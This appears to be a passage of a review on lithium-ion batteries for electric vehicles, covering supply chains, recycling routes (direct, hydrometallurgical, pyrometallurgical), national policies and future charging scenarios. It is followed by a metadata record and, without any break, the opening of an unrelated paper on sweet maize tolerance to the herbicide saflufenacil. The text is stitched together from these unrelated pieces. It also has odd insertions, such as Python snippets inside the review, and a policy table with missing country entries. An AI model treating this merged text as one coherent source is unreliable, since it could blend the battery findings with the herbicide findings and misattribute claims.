Quality and efficiency are critical in battery manufacturing: manufacturing technology determines manufacturing efficiency and battery performance, thereby affecting manufacturing capacity. It was reported that the Ford Motor Company announced the deployment of fifth-generation (5G) network technology in manufacturing to enhance connectivity and achieve higher manufacturing efficiency. [69] Manufacturing technology and battery design largely stem from battery R&D. Public and private R&D has been the major driving force behind LIB cost reduction over the past three decades, [6] with the R&D of chemistry and materials science playing a major role. [6] Similar efforts may further reduce the cost and enhance the performance of LIBs in the future. In this regard, the US has a solid foundation in battery research and technology, and the government has maintained good strategic and financial support for fundamental research. Recently, the US Department of Energy (DOE) announced $209 million in funding for vehicle battery research. [70] A battery management system is essential to keep batteries in proper working condition. In EVs, semiconductors play an important role in the electronic control of automotive power systems, such as fast charging and reducing energy loss, and semiconductor chips are indispensable components of EV power control systems. [34] An interruption in any part of the supply chain can affect the whole production.
For example, the semiconductor industry has been hit hard since the outbreak of the COVID-19 pandemic, and vehicle production has been severely limited by the shortage of semiconductor chips. [71] In 2019, Europe, the US, Japan, and China held 37%, 33%, 26%, and 2% of the global automotive semiconductor industry, respectively. [34] Developing the semiconductor industry is thus equally important for building a robust supply chain for LIBs and EVs. In all, a resilient supply chain requires not only a stable raw material supply but also a joint effort from related fields.
The EV industry is the largest market for LIBs and reflects the global competition in LIB supply chains and manufacturing. EV sales are expected to grow steadily by tens of millions each year over the next few decades. [72] In 2020, the top three countries in BEV and plug-in hybrid electric vehicle ownership were China, the US, and Germany. [73] In addition, the EV penetration rate in the vehicle market indicates the intention to electrify: the top ten countries for EV share of new car sales in 2020 were all located in Europe, thanks to their incentive policies. [72] More countries have sped up their transition to EVs as carbon neutrality pledge deadlines approach, and LIBs will play a critical role in this rapid growth. The LIB industry is somewhat less vulnerable to raw material disruption than fossil fuels because of the wide range of available electrode materials. Furthermore, consumers are not immediately affected by LIB supply chain interruptions because of the relatively long life cycle of LIBs. For instance, the price of crude oil recently hit its highest level since 2008, [74] and every gasoline refill exposes ICEV owners directly to that volatility, whereas the operation of existing EVs is barely altered even though the manufacturing and sale of new EVs are affected by LIB supply chain fluctuations. In addition, fossil fuels require continuous inputs once combusted, while the minerals in LIBs can be reused and recycled. Therefore, a worldwide energy crisis in the LIB industry is unlikely. However, the diversity of mineral types and their concentrated geographical distributions bring uncertainties to the supply chain, and a stable supply chain is critical for the sustainable development of LIBs. Major LIB-producing countries have been attempting to establish domestic supply chains and gain an edge in LIB manufacturing, for which a sustainable supply of raw materials is a prerequisite. In this regard, developing local mining and processing capability is essential for boosting domestic LIB manufacturing capacity. Competition between leading countries can accelerate the advancement of LIBs and the establishment of a global LIB industry ecosystem. On the other hand, closer worldwide collaboration (e.g., multiyear supply agreements) and associated legislation are needed to achieve a sustainable supply chain.
Recycling
The proper processing of used LIBs has become a pressing and inevitable task as more first-generation EVs approach end-of-life and raw materials become resource-limited. At present, the global recovery rate of used LIBs is rather low, [76] and a substantial share of used LIBs is handled inefficiently and dangerously, for example by landfilling and illegal disposal. [76] Such inappropriate processing has caused extensive damage to the environment and human health, as well as numerous fire and explosion incidents. [76] Instead, giving used LIBs a "second life" through reuse, remanufacturing, and repurposing appears to be a promising strategy for harnessing their remaining energy; [76] for example, used EV LIBs can be repurposed for grid energy storage. However, there are currently few regulations for second-life LIBs. Corresponding legislation should be established in advance to avoid potential chaos in the market as more used LIBs emerge.
Recycling is another approach to satisfying carbon neutrality criteria and easing anxiety over finite resources. Recycling can potentially lower the overall energy consumption and emissions relative to virgin battery production as the LIB recycling industry grows and matures. [77] For instance, the production of transition metals relies largely on sulfide ores, a process that releases SOx emissions that damage the environment through acid rain and soil contamination. Effective recycling of transition metals can substantially reduce these emissions from raw mineral processing. Dunn et al. reported, based on LCA, that LIB recycling can effectively reduce GHG and SOx emissions, especially for Ni- and Co-containing cathodes. [8h] Therefore, recycling can significantly foster the establishment of a sustainable LIB industry. However, the LIB recycling industry still faces numerous practical hurdles, such as the technical limitations of the different recycling routes.
Generally, there are three major LIB recycling routes, shown schematically in Figure 4. The direct recycling route (denoted by the blue arrows) involves the least processing of the three. First, the electrolyte is extracted from the spent LIB using supercritical carbon dioxide; the retrieved electrolyte can be recycled after further processing. The remaining components are then separated according to their properties through a series of physical processes, and the recovered cathode material can be reintroduced to battery assembly lines. Re-lithiation or additional processing of the recovered cathode is normally needed to compensate for the performance loss. [78] Direct recycling can recover nearly all battery materials and requires less treatment than the other routes, but the performance of the recovered materials may be compromised. [57] Hydrometallurgical recycling (denoted by the orange arrows) involves leaching, which recovers metal species from aqueous media. Spent LIBs are pretreated with several physical processes, such as shredding and screening, to obtain black mass and Cu and Al foils. The black mass is leached to obtain a solution containing the metal cations. After solvent extraction, the dissolved salts can be separated, recovered, and reintroduced into the supply chain for cathode synthesis and battery manufacturing. [77] Hydrometallurgical recycling efficiently isolates the components of interest in an aqueous environment, and the product obtained is pure. The procedures are relatively energy-efficient and environmentally friendly because no high-temperature processing is involved; however, treating the large volumes of effluent raises the cost.
The third route requires additional energy-intensive smelting steps. Pyrometallurgical recycling recovers different metals through oxidation or reduction reactions at high temperatures. As indicated by the green arrows, the spent LIB can be dismantled and shredded first to generate black mass, or it can be fed directly into the furnace to obtain a mixed metal alloy (e.g., Ni, Co). The latter approach is generally preferred because separating the black mass from the Al and Cu foils adds cost, and the Al can serve as a reductant in the furnace to save smelting energy. [77] In that case, a mixture of Al and Li oxides remains in the slag, which is normally not recovered because doing so is uneconomical. Next, the obtained metal alloy undergoes leaching and solvent extraction (hydrometallurgical recycling) for cathode resynthesis and battery assembly. Pyrometallurgical recycling needs little mechanical pretreatment and can recover metals efficiently, but it entails substantial energy consumption, emissions, and transportation expense. The choice of recycling route may vary with the type of spent LIB and the material of interest. For example, LIB recycling initially focused on recovering Co because of its high value; subsequently, recycling at the cathode level may offer higher revenue than recovering particular metal constituents as Co contents fall and other cell components come into higher demand. Direct recycling may offer additional benefits in this regard, although maintaining the performance of recycled materials at the level of virgin materials remains challenging. [77] Overall, the technical obstacles need to be addressed to make recycling more economically attractive.

Figure 4. Three LIB recycling routes, indicated by the blue, orange, and green arrows. Physical processing (mechanical separation and dissolution) is usually adopted as a pretreatment for all recycling routes. Depending on the materials to be recovered, one can choose a specific recycling route to achieve higher recycling efficiency at lower cost. For example, hydrometallurgical and pyrometallurgical recycling are economical for high-Ni and Co cathodes but not appropriate for cathodes containing fewer precious metals, such as LFP and LMO. [77,78]
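The route-selection logic implied by Figure 4 can be summarized in a few lines of code. The mapping below is an illustrative simplification of the economics discussed above (metal value drives the choice), not an industry standard; real decisions also weigh plant location, feed volume, and recovered-material quality.

```python
# Illustrative simplification of the route choice implied by Figure 4:
# metal value drives the economics. This mapping is a sketch, not an
# industry standard; real decisions also weigh plant location, feed
# volume, and recovered-material quality.

def suggest_route(chemistry: str) -> str:
    ni_co_rich = {"NMC", "NCA", "LCO"}
    if chemistry.upper() in ni_co_rich:
        # Ni/Co value supports leaching or smelting despite their cost.
        return "hydrometallurgical (or pyrometallurgical at scale)"
    # Fe/Mn-based cathodes carry little elemental value; recovering the
    # intact cathode compound is the only potentially economical path.
    return "direct cathode recycling (if quality requirements are met)"

for chem in ("NMC", "NCA", "LCO", "LFP", "LMO"):
    print(f"{chem}: {suggest_route(chem)}")
```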
For the aforementioned traditional recycling approaches, preprocessing steps such as discharging and pulverization are normally required. Spent LIBs entering the recycling line are mostly in partially charged states, and the lithiated graphite anode is highly reactive in air, which can readily lead to aggressive thermal release and safety hazards. Discharging the spent LIBs first is therefore critical, yet tedious: the process is time-consuming and requires large spaces to prevent cell contact, and the salt solution used for discharging incurs additional cost. Once discharged, the spent LIBs can be safely pulverized into mixed powder. As discussed, hydrometallurgical and pyrometallurgical recycling require extensive heat and chemical treatments to separate and recover the desired metals. However, impurities such as Cu, Al, Fe, and organic compounds inevitably remain in the final recycled products, even with direct recycling, which needs the least processing. [79] Zhang et al. and Peng et al. investigated the effect of Cu impurities in recycled NMC and LCO batteries. [79a,b] Metallic Cu, especially that left by physical separation in the direct recycling approach, can easily cause short-circuiting. [79a] A low content of Cu-ion impurity can benefit the capacity and capacity retention of recovered cathodes, whereas excess Cu ions introduce impurity phases into the cathode and deteriorate performance. [79a,b] Similar beneficial effects at low content and detrimental effects at high content have also been reported for Al and Fe. [79c,d] In industrial recycling processes, however, the actual impurity content can be far more variable. It is therefore critical to monitor and control impurity levels to ensure the quality of recycled materials, and regulations setting standards for impurities in recycled electrodes are recommended.
In addition to the three traditional recycling routes, novel approaches have been demonstrated at the research level to address the energy intensity, high cost, and heavy waste of current methods. Zhao et al. reported a precise separation method that can separate jellyroll cell components simply in water. [80] The discharging pretreatment is avoided without compromising safety, because the water isolates oxygen and immediately extinguishes any fire during disassembly. LiCx in the graphite anode reacts with water, generating heat and bubbles that facilitate the dissolution of the binder and the peeling of anode materials from the current collector. At the lab scale, this method achieved higher recycling efficiency, simpler processing, and higher revenue than traditional recycling approaches. Wang et al. added ammonium sulfate during recycling to reduce the decomposition temperature of LCO to below 400 °C, which lowered the energy consumption and enhanced the recycling efficiency. [81] These novel recycling methods show appealing results at the research scale, but further technical challenges and questions of economic efficiency must be addressed before they can be applied to industrial-scale recycling.
Recycling can relieve the pressure on the primary production of essential metals (e.g., Co and Ni) in the long term, but there could be a short-term shortage affecting Ni-based cathodes, as discussed in the last section. A consensus nevertheless holds that recycling will play an indispensable role, at least in the long term: the IEA estimates that the volume of spent EV batteries will surge after 2030. [4] In the meantime, boosting primary production remains the most feasible way to address short-term Co or Ni supply risk. The World Bank reported that even if the end-of-life recycling rate of Co reached 100%, there would still be a large demand for primary Co production. [82] An additional concern is the long lead time of mining projects, estimated at around 16 years on average from discovery to production, [4] which may not satisfy rapidly ramping demand in the short term. We therefore suggest that more incentive policies be established to simplify and accelerate the mining process and to encourage mining companies and investors to develop new projects. Meanwhile, governments should provide stronger support to the LIB recycling industry, because profitability is relatively low at this early stage, when recycling operates at small scale and primary production can still meet demand. For countries without a robust domestic supply chain, recycling can supplement the supply of primary battery components. [57] Supportive policies are also critical to tackling the practical hurdles faced by the LIB recycling industry. For instance, LIB manufacturing was initially not standardized with recycling in mind, so identifying and classifying the various cell components and electrode materials raises recycling expenses. In the US, spent LIBs are classified as hazardous waste, and the cost of transporting them accounts for more than half of total recycling expenses. [63] Corresponding policy support can create monetary incentives for manufacturers to resolve these challenges; for example, standardizing cell design and labeling materials can reduce pretreatment costs during recycling. Labeling battery chemistries in a standard way and classifying different batteries during recycling would also help realize the highest environmental benefits of battery recycling identified by LCA. Ma et al. discussed several challenges faced by the LIB recycling community. [83] In addition to the technical obstacles of the three aforementioned recycling approaches, evolving battery designs (e.g., Tesla's 4680 cylindrical cells and "tabless" design, BYD's blade battery pack, and CATL's cell-to-pack technology) complicate disassembly and pretreatment. [83] Nearly 2 million metric tons of spent LIBs are expected globally per year by 2030, pushing recycling to a large scale. [83] However, the profit of large-scale recycling is limited by the lack of regulatory support, nonstandardization, and the high cost of transporting and storing spent batteries at large scale. [83] The trend toward Co-free materials further diminishes the economic benefit of recycling, and convincing battery manufacturers to adopt recycled materials is also challenging because the performance of recycled materials needs to match or exceed that of virgin ones. [83]
Therefore, more collaboration between industry, universities, and laboratories is needed to meet practical industrial requirements. [83] Government incentives and policies can attract more researchers, manufacturers, and investors, enabling recycling technologies to progress and total costs to fall.
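To give a sense of scale, the sketch below converts the roughly 2 million metric tons of annual spent LIBs projected for 2030 (the figure cited from [83]) into recoverable metal tonnages. The pack-level mass fractions and the 90% recovery rate are illustrative assumptions, not data from the cited studies.

```python
# Back-of-envelope recovery from ~2 Mt of spent LIBs per year by 2030
# (the 2 Mt figure comes from [83]; the pack-level mass fractions and
# recovery rate below are illustrative assumptions).

SPENT_LIB_T_PER_YEAR = 2_000_000

MASS_FRACTION = {"Li": 0.02, "Ni": 0.06, "Co": 0.03, "Cu": 0.09}
RECOVERY_RATE = 0.90          # assumed process recovery efficiency

for metal, fraction in MASS_FRACTION.items():
    recovered_kt = SPENT_LIB_T_PER_YEAR * fraction * RECOVERY_RATE / 1000
    print(f"{metal}: ~{recovered_kt:,.0f} kt recoverable per year")
```

Even with these rough inputs, the recovered tonnages are comparable to a meaningful fraction of the annual mining shares discussed earlier, which is why recycling is expected to matter in the long term.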
Policies and Legislation
Government policies and legislation often regulate and guide LIB materials development, supply chains, manufacturing, and recycling. Investigating the regulations of various countries is crucial to understanding the global LIB industry. Several countries and regions have declared their targets for addressing environmental issues and global climate change. Specifically, the US, Canada, and the EU plan to achieve net-zero emissions by 2050, and China aims for carbon neutrality by 2060 (Table 2).

Table 2. Policies and targets of China, the EU, the US, and Canada.

Carbon targets:
- China: Carbon neutrality by 2060. [90]
- EU: 1) Carbon neutrality by 2050 and at least 55% emissions reduction by 2030; [91] 2) CO2 emissions standards (in g CO2 km−1) tighten by 37.5% for cars and 31% for vans between 2021 and 2030. [92]
- US: Carbon-pollution-free electricity by 2035 and economy-wide net-zero emissions by 2050. [93]
- Canada: Net-zero emissions by 2050. [94]

EVs market:
- China: 1) NEV sales reaching 20% of vehicle sales by 2025, and NEVs becoming the mainstream of new vehicle sales by 2035; [1a] 2) targets for manufacturers: annual NEV credits as a percentage of annual vehicle sales (14% in 2021, 16% in 2022, 18% in 2023). [95]

Charging infrastructure:
- China: 1) Building more than 120 000 charging stations and more than 4.8 million charging outlets by 2020; [98] 2) the 13th Five-Year Plan included RMB 90 million in funding for the installation of charging infrastructure; [99] 3) over 30 cities offer subsidies for home or public EV charging. [99]
- EU: Target of 1 million publicly accessible chargers installed by 2025. [100]
- US: 1) Building a national network of 500 000 EV chargers by 2030; [101] 2) investing $7.5 billion to build a national network of EV chargers. [102]
- Canada: Investing an additional $150 million over 3 years in charging and refueling stations across Canada, as announced in 2020. [103]

Manufacture:
- China: 1) Restricting subsidies to larger battery production facilities (at least 8 GWh production capacity); 2) tax exemptions for battery producers; 3) restricting EV incentives to vehicles with batteries manufactured in China to attract foreign investment. [85]
- EU: The European Investment Bank supported the construction of an LG Chem Li-ion battery cell-to-pack manufacturing Gigafactory in Poland in early 2020 (EUR 480 million). [86a]
- US: Near-term objectives (2025): 1) develop federal policies to support the establishment of resilient domestic and global sources and supplies of key raw materials; 2) decrease cost to enable a $60 kWh−1 cell cost. Long-term objectives (2030): 1) eliminate Co and Ni in LIBs; 2) reduce the cost of EV pack manufacturing by 50%. [63]
- Canada: 1) Investing CAD 590 million in Ford Motor Company Canada to support EV production; [86b] 2) the federal and Québec governments are providing CAD 100 million to Lion Electric to support a battery pack assembly plant project. [104]

Recycling:
- China: Encouraging the standardization of battery design, production, and verification, as well as repairing and repackaging for second-life utilization. [87]
- EU: 1) From 1 July 2024, only rechargeable industrial and EV batteries with an established carbon footprint declaration can be placed on the market; 2) increasing the transparency of the battery market and the traceability of large batteries throughout their life cycle using new IT technologies, such as the Battery Passport. [88]
- US: Near-term objectives (2025): 1) foster the design of battery packs for ease of second use and recycling; 2) increase recovery rates of key materials such as cobalt, lithium, nickel, and graphite. Long-term objective (2030): create incentives for achieving 90% recycling of consumer electronics, EV, and grid-storage batteries. [63]
- Canada: Lithion Recycling Inc. received $3.8 million and Li-Cycle Corp. received $2.7 million for LIB recycling. [89]

Automotive electrification will play a key role in this decarbonization process. Many countries and regions have announced policies for EV development, infrastructure construction, and LIB recycling in response to the growing competition in the EV market. Herein, we select several active players in the worldwide race for EVs and LIBs and demonstrate how their policies can impact EV and LIB development on a national or global scale.
Present global EV sales are contributed primarily by Europe, China, and the US. [3,72] These major contributors have established EV sales targets to further stimulate their EV development (Table 2). The EU announced the goal that nearly all cars, vans, buses, and new heavy-duty vehicles will achieve zero emissions by 2050. [1b] China targets 20% of new vehicle sales from new energy vehicles (NEVs) by 2025, [1a] and BEVs are expected to become the mainstream of new vehicles sold in China by 2035. [1a] In the US, EV sales policies operate primarily at the state level: sixteen states and regions expect zero-emission vehicle (ZEV) sales to constitute 30% of all new medium-duty vehicle (MDV) and heavy-duty vehicle (HDV) sales by 2030 and 100% by 2050. [1c] In Canada, ZEV sales are expected to account for 10%, 30%, and 100% of LDV sales by 2025, 2030, and 2040, respectively. [1d] More countries in Asia, Europe, and North America are actively building up their EV industries; specific policies can be found in ref. [84]. Charging infrastructure must be developed accordingly to accommodate the rapid growth of EVs. Its wide implementation can boost the confidence of EV consumers and stimulate EV manufacturers, so charging infrastructure determines the potential EV market. The countries leading in EV sales also invest heavily in charging infrastructure (Table 2). Furthermore, geographic and climatic factors need to be addressed in EV deployment because the performance of automotive batteries is susceptible to the environment, particularly temperature. In summary, several of the world's top economies have shown their determination to develop EVs and have established aggressive targets. Such positive signals can spread confidence throughout the LIB community.
The LIB is one of the most critical components of an EV. Global LIB production capacity and its distribution have evolved over time, largely driven by the policies of different countries and regions. At present, LIB manufacturers are distributed mainly across Asia, North America, and Europe (Figure 3). Many countries have worked to establish resilient domestic supply chains and manufacturing to gain an advantage in the global competition over EVs and LIBs. The Chinese government announced tax exemptions for battery producers to promote domestic manufacturing, [85] and the US, Canada, and many European countries have likewise provided strong financial support to domestic battery manufacturers. [63,86] At the materials level, there is a general trend toward Ni- and Co-free cathodes. The US DOE announced the goal of reducing dependence on Ni and Co and expects to eliminate them from LIBs by 2030, [63] and more automotive companies are exploring Ni/Co-free cathodes. [31] The two types of cathodes will coexist for different purposes, but Ni and Co battery chemistries could eventually be supplemented or substituted by more sustainable alternatives. Importantly, it is becoming more challenging for emerging materials to be cost-competitive given the extensive investments already committed to incumbent chemistries. [30] Legislative support might therefore be required to prevent the "lock-in" of incumbent materials when developing new ones. In general, many countries are attempting to develop domestic manufacturing in a more sustainable manner.
Recovering scarce metals through recycling is another path to building a sustainable LIB industry. As discussed, unstandardized battery labeling causes substantial additional effort during recycling, and country-level regulations can significantly enhance recycling efficiency. The Chinese government issued the Interim Measures requiring battery manufacturers to keep their products standardized, [87] and the Measures recommend cooperation between battery manufacturers and NEV manufacturers for easy tracking of battery life cycles. [87] The European Commission proposed to increase the transparency and traceability of batteries throughout their entire life cycle by using new IT technologies, such as the Battery Passport. [88] Relatively immature technology and limited investment and profit are other challenges for LIB recycling. Financial and strategic support from governments can help attract more investment, which will stimulate the scaling up of the LIB recycling industry and drive technology improvement. The European Commission proposed mandatory requirements for batteries on the EU market, such as a minimum amount of recycled content in new batteries. [88] Canada supports the development of recycling by funding several LIB recycling companies, [89] and the US intends to establish federal policies to promote LIB recycling, targeting the recycling of 90% of batteries in consumer electronics, EVs, and grid storage by 2030. [63] In summary, governments across the world are enacting more supportive policies for the LIB recycling industry.
Perspectives
In summary, we have reviewed the status of EV batteries from the perspectives of environmental impact, electrode materials, supply chain, manufacturing, recycling, and government policies. Generally, the GHG emissions of EVs are lower than those of ICEVs owing to their high powertrain efficiency and zero tailpipe emissions, although producing an EV can generate more emissions than producing an ICEV because of the manufacturing of the battery and electric powertrain system. Electricity generation sources also largely determine the final emissions of EVs, so promoting the use of renewable electricity is vital to maximizing the environmental benefits of EVs.
At the materials level, increasing Ni content is the general trend for Ni-based cathodes, but Ni-free and Co-free cathodes, especially LFP, have regained attention in recent years. Ni and Co are more vulnerable to supply chain disruption than Fe because they are more valuable and more unevenly distributed. From the perspective of most EV consumers, high energy density is no longer critical as long as a battery satisfies their daily commuting needs; moreover, it is in less demand given the fast charging capability of LFP and the expansion of the charging station network. The advantages of low cost and safety therefore make LFP stand out. Nevertheless, Ni-based NMC and NCA materials still undergo rapid development and constitute a large portion of the EV battery market. To narrow the energy density gap between Ni- and Co-free cathodes and Ni-based cathodes, we have outlined several directions: 1) enhance the cell-level energy density by developing high-energy anode materials, such as Li metal and Si anodes; 2) optimize the form factor of the individual cell and battery pack design; 3) construct fast charging facilities and develop novel charging methods (e.g., wireless charging, Figure 5); and 4) develop battery pack swapping for suitable EV types, such as public transportation. In addition, Li-excess cathodes, such as LLOs and DRX, show high capacity at the research level without relying extensively on Ni or Co, but fast capacity decay, limited Li kinetics, and oxygen loss raise practical concerns about performance and safety, hindering their commercialization. We believe that demand for both Ni-based cathodes and Ni- and Co-free cathodes will persist for specific applications, and sustainable cathode chemistry will become imperative as supply chain issues emerge.
A volatile supply chain could offset the performance benefits delivered by electrode materials. The essential minerals for producing LIBs are scattered globally, and no single country possesses all the raw materials needed for battery manufacturing. However, the global distribution of each specific metal is relatively concentrated. For example, the DRC accounts for 69.0-70.4% of global Co mining, and Australia accounts for 48.7-52.0% of global Li mining. Such uneven distribution of essential raw minerals can easily induce LIB supply chain disruption or price volatility in the event of geopolitical conflict or global crises. Regarding current mineral processing and battery manufacturing capacity, Asian countries, especially China, play the dominant role globally. Beyond production capacity, developing technology and enhancing manufacturing efficiency are also significant. Public and private R&D has been the major driving force behind LIB cost reduction in the past. The US has a solid foundation for battery research and technology, and the government continues to provide strategic and financial support for fundamental research. We believe that support for diversified fundamental battery research and lab-to-market development is of great importance to the evolution of next-generation EV batteries. Consumers and existing battery products are less affected by LIB supply chain disruption than by fossil fuel shortages, but a stable supply chain is necessary for the long-term sustainable development of LIBs. Closer collaboration across the world and associated legislation are recommended to achieve a sustainable supply chain.
Strengthening the supply chain ensures stable primary battery production. Meanwhile, battery recycling becomes indispensable as mineral resources become limited and massive volumes of spent LIBs are generated. A common consensus is that recycling can relieve the shortage of raw materials in the long term. However, it is also forecasted that there could be a short-term deficit of several essential metals, such as Co and Ni, in the decade to come, as discussed earlier. Therefore, we suggest that more incentive policies for both primary mineral production and recycling be implemented. Large-scale recycling facilities and high throughput can effectively enhance energy utilization efficiency and potentially lower the overall energy consumption relative to primary battery manufacturing. However, the environmental impact may vary with the recycling route and battery chemistry. For example, recycling LFP results in a net increase of GHG emissions compared to not recycling, regardless of which of the three major recycling routes is used. [8i] In addition, traditional recycling methods can introduce impurities that affect the performance of recycled products. Therefore, it is critical to monitor impurity levels and establish standards. More investigations into novel recycling approaches are expected to address the energy-intensive and environmental issues of current methods. Besides, unstandardized spent batteries from different battery manufacturers lead to extensive inefficient manual labor in pretreatment, such as sorting. Therefore, we suggest that regulations be established to standardize primary battery production.
Government policies and regulations are imperative not only for the recycling industry, but also for guiding the direction of LIB development. Several top economies in the world have shown their determination to secure domestic supply chains and develop local battery manufacturing. They have established aggressive targets of partial or full automotive electrification in the next couple of decades to meet carbon neutrality. At the cathode chemistry level, the US DOE set targets to eliminate Ni and Co in LIBs by 2030. We also want to highlight the significance of government regulations in preventing the "lock-in" of incumbent materials during the development of new materials.
LIBs have reshaped the way we travel and connect with each other since their first commercialization. In the past decade, LIBs have played a significant role in the smartphone revolution. In recent years, LIBs have demonstrated remarkable success in EVs for a greener automotive industry. In the next few decades, LIBs will not only experience expeditious growth but also drive the construction of associated infrastructure. LIBs will shape the world into a more interconnected and smarter place with the rise of 5G networks. Herein, we envision the potential development of energy storage technologies and EV charging infrastructure in the future (Figure 5). In the short-term scenario, which requires relatively little technological advancement, EVs running out of electricity can be charged via peer-to-peer car charging (P2C2) by other vehicles (Figure 5a). P2C2 requires low-battery EVs to be plugged into full-battery vehicles. [105] Low-battery EVs can also be charged while driving by mobile charging stations, which are portable and temporarily installed in EVs. [105] However, the weight of the portable charging stations may reduce vehicle efficiency. Service vehicles will be on duty to provide P2C2 services or mobile charging stations. These charging methods are not well suited for routine charging but can offer rescue to EVs in an emergency. In regions that receive sufficient sunshine, solar panels can be integrated on EVs to provide auxiliary support to the battery system; Sono Motors has announced its solar-cell-integrated EV, the Sion, which utilizes solar power. [106] Regarding infrastructure, more charging stations can be constructed along highways, accompanied by entertainment facilities such as restaurants and shopping malls, which can serve people waiting for charging and boost the local economy. To summarize, we have proposed several approaches to modifying current EV charging methods based on relatively mature technologies. In addition, we conceive a long-term scenario that involves more significant adjustments to current charging methods and infrastructure.
In the long-term scenario, both EVs and infrastructure will experience more technical breakthroughs, and there will be more interaction between them. Smart roads can be constructed to combine wireless charging with various functions, such as ice melting in winter and traffic condition monitoring (Figure 5b). EVs can be charged on the road while driving, which will alleviate range anxiety. In addition, energy harvesting technologies, such as piezoelectric systems, can be integrated into smart roads to generate electricity from the stress and motion of vehicles, enhancing energy utilization efficiency. [107] Several smart-road projects integrating wireless charging have been demonstrated in Europe and the US by Electreon Wireless Ltd and Integrated Roadways. [108] This approach might open the door to a broader range of automotive batteries with lower energy density but superior economic and environmental benefits. During the transition period, roads can be partially reconstructed to accommodate one or two wireless charging lanes based on established infrastructure. Vehicle-to-everything (V2X) communication will be strengthened significantly thanks to the rapidly developing high-speed 5G network. [69] V2X can create an information network by exchanging data between vehicles and traffic systems. As a result, a smarter, safer, and more efficient traffic ecosystem will become a reality, including more mature autonomous driving, collision avoidance, and traffic-jam forecasting and reduction. Breakthroughs in electricity generation are also expected for the greener long-term scenario. Electricity generation from fossil fuels is still a significant source of carbon emissions today. More renewable energy sources, such as wind and solar energy, will be deployed in suitable regions for future electricity generation. Electricity distribution stations can be constructed along with the charging infrastructure to achieve more flexible and convenient charging. In all, we anticipate that EVs will be more interconnected with other facilities in the long-term scenario. The innovation of charging methods will also provide more room for battery materials development.
It is the worst of times: resources on Earth are becoming more limited, and human society faces energy crises and environmental degradation. It is the best of times: people are actively seeking strategies to address energy and environmental challenges with advanced and sustainable energy storage technologies. LIBs have changed and will continue to change people's lifestyles and the ecosystem in the twenty-first century. In the upcoming decades, LIBs at the materials level will gradually shift to more sustainable chemistries. With extensive financial and strategic support from governments around the world, LIB manufacturing and associated infrastructure construction will undergo rapid growth. Climate issues can be alleviated by substituting EVs for ICEVs. Recycling will occupy a larger portion of the market and in turn enhance the economic and environmental efficiency of battery production. The healthy growth of the LIB industry can never be accomplished by one field alone. We believe that building synergies between the different fields surrounding the LIB industry will greatly promote the development of LIBs for a more sustainable society. This Perspective aims to inspire more interdisciplinary discussion and investigation into the advancement of LIBs.
Supporting Information
Supporting Information is available from the Wiley Online Library or from the author.
Haibo Huang is an associate professor in the Department of Food Science and Technology at Virginia Tech. His research interests are the conversion of biomass into food ingredients, biochemicals, and functional biomaterials, as well as techno-economic analysis and life cycle analysis of bioprocesses and renewable technologies. He holds a B.Sc. in Biosystems Engineering (Zhejiang University), an M.Sc. in Biological Engineering (University of Arkansas), and a Ph.D. in Agricultural and Biological Engineering (University of Illinois at Urbana-Champaign).
Feng Lin is an associate professor of Chemistry at Virginia Tech. He holds a Bachelor's degree in Materials Science and Engineering from Tianjin University and a Ph.D. degree in Materials Science from Colorado School of Mines. Previously, he worked at QuantumScape, Lawrence Berkeley National Laboratory, and National Renewable Energy Laboratory. His research interests include energy storage, catalysis, and smart windows. | 2022-05-12T15:19:13.395Z | 2022-05-10T00:00:00.000 | {
"year": 2022,
"sha1": "439976322ffb197d5c3d8d2f1d843f12f84f5557",
"oa_license": "CCBYNC",
"oa_url": "https://onlinelibrary.wiley.com/doi/pdfdirect/10.1002/aenm.202200383",
"oa_status": "HYBRID",
"pdf_src": "Wiley",
"pdf_hash": "65ab2d9c85c72769cab44002dca53e709d3c5ea5",
"s2fieldsofstudy": [
"Environmental Science",
"Engineering"
],
"extfieldsofstudy": []
} |
55726022 | pes2o/s2orc | v3-fos-license | Response of Eight Sweet Maize (Zea mays L.) Hybrids to Saflufenacil Alone or Pre-Mixed with Dimethenamid-P
Saflufenacil is a new herbicide for use in field maize (Zea mays L.) and other crops that may have potential for weed management in sweet maize. Tolerance of eight sweet maize hybrids to saflufenacil and saflufenacil plus dimethenamid-p applied preemergence (PRE) was studied at two Ontario locations in 2008 and 2009. Saflufenacil applied PRE at 75 and 150 g·ha⁻¹ and saflufenacil plus dimethenamid-p (pre-mixed) applied PRE at 735 and 1470 g·ha⁻¹ caused minimal (less than 5%) injury in Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize hybrids at 1 and 2 weeks after emergence (WAE). Saflufenacil or saflufenacil plus dimethenamid-p applied PRE did not reduce plant height, cob size, or yield of any of the sweet maize hybrids tested in this study. Based on these results, saflufenacil and saflufenacil plus dimethenamid-p (pre-mixed) applied PRE at the doses evaluated can be safely used for weed management in Cahill, GH4927, Harvest Gold, Rocker, BSS5362, GG236, GG447, and GG763 sweet maize under Ontario environmental conditions.
Introduction
Sweet maize (Zea mays L.) is one of the most important field-grown vegetables in Ontario [1]. In 2009, nearly 112,000 tonnes of sweet maize were produced on approximately 9000 hectares with a farm-gate value of $36 million, ranking as the second largest field-grown vegetable crop in Ontario in terms of farm-gate value [1]. Weed control is critical in sweet maize production to maintain quality and yield and to remain competitive in the global marketplace. More research is needed to identify herbicide options that can effectively control grass and broadleaved weeds in sweet maize production.
Saflufenacil is a pyrimidinedione that inhibits protoporphyrinogen-IX-oxidase (PPO). Weeds susceptible to saflufenacil show injury symptoms within a few hours and die in 1 to 3 days [6]. Saflufenacil has both contact and residual activity against susceptible weeds and is mainly translocated in the xylem [6]. Saflufenacil is applied at relatively low doses and has low environmental, toxicological, and eco-toxicological impact, with minimal residual carryover and persistence in the soil [6]. The proposed dose for sweet maize in Ontario is 75 g a.i. ha⁻¹. Saflufenacil provides a novel mode of action (PPO inhibition) for sweet maize that is different from currently used broadleaved herbicides, reducing the potential for selection of herbicide-resistant weed biotypes [6,7].
